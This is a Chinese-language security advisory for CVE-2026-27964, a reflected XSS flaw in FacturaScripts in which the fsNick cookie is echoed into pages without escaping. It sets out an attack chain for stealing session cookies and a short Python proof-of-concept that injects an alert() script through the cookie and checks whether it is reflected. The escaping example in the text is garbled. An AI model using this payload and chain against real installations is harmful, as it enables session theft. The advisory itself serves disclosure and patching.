CVE-2026-27964 CVSS 3.9 低危

CVE-2026-27964 FacturaScripts反射型XSS漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27964

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

3.9 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

FacturaScripts

漏洞概述

FacturaScripts 2025.7及更早版本存在反射型跨站脚本（XSS）漏洞。该漏洞是由于fsNick cookie参数未经适当过滤直接输出到HTML所致。虽然服务器检测到异常会强制登出，但包含恶意脚本的响应已先到达浏览器，导致代码在重定向前执行。攻击者可利用此漏洞在受害者浏览器中执行任意脚本。

技术细节

该漏洞属于反射型跨站脚本漏洞（Reflected XSS），其根本原因在于FacturaScripts应用程序未能对用户可控的Cookie参数`fsNick`进行有效的安全过滤。在正常的业务逻辑中，应用程序会读取该Cookie并在前端页面DOM中回显，但未使用HTML实体编码（如`<`转义为`<`），导致浏览器将其渲染为可执行的HTML代码。尽管服务端存在会话验证机制，当检测到Cookie异常（如签名不符）时会触发注销流程并强制重定向，但由于HTTP响应生成的顺序问题，包含恶意脚本的HTML内容实际上已经发送到了客户端。攻击者利用这一逻辑缺陷，通过诱导受害者访问恶意链接或通过中间人攻击修改其Cookie，即可在受害者的浏览器上下文中执行任意JavaScript代码。这种攻击方式能够绕过同源策略，窃取用户的Session ID、敏感个人信息，甚至结合其他漏洞进一步控制用户账户。

攻击链分析

STEP 1

1. Payload Construction

攻击者构造包含恶意JavaScript代码的Payload，例如窃取Cookie的脚本。

STEP 2

2. Cookie Modification

攻击者通过社会工程学诱导受害者点击链接，或利用浏览器漏洞修改受害者本地存储的fsNick Cookie值为恶意Payload。

STEP 3

3. Request Sending

受害者的浏览器向FacturaScripts服务器发送请求，请求头中携带了被篡改的fsNick Cookie。

STEP 4

4. Server Response Generation

服务器读取fsNick Cookie，并将其值未经转义地直接插入到HTML响应流中。

STEP 5

5. Client-Side Execution

浏览器接收HTTP响应，解析HTML并执行其中的恶意脚本。此时服务器端的注销/重定向逻辑尚未生效或响应尚未完全处理。

STEP 6

6. Objective Achievement

恶意脚本在受害者上下文中执行，可能窃取Session信息或执行恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-facturascripts-url"
# The malicious payload to be executed via XSS
xss_payload = "<script>alert('CVE-2026-27964 XSS');</script>"

# Create a session to manage cookies
session = requests.Session()

# Set the vulnerable 'fsNick' cookie with the payload
# In a real scenario, this cookie might be set via JavaScript or client-side manipulation
session.cookies.set('fsNick', xss_payload)

try:
    # Send the request to the target
    response = session.get(target_url)

    # Check if the payload is reflected in the response body
    if xss_payload in response.text:
        print("[+] Vulnerability Confirmed: The payload was reflected in the response.")
        print("[+] If executed in a browser, the script would run before the redirect.")
    else:
        print("[-] Vulnerability Not Detected or Patched.")

except Exception as e:
    print(f"Error occurred: {e}")

影响范围

FacturaScripts <= 2025.7

防御指南

临时缓解措施

建议用户立即将FacturaScripts升级至2025.8或更高版本。在无法立即升级的情况下，应部署Web应用防火墙（WAF）以检测和拦截包含恶意脚本特征的Cookie参数。此外，管理员可以临时禁用或清理用户侧的fsNick Cookie功能，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表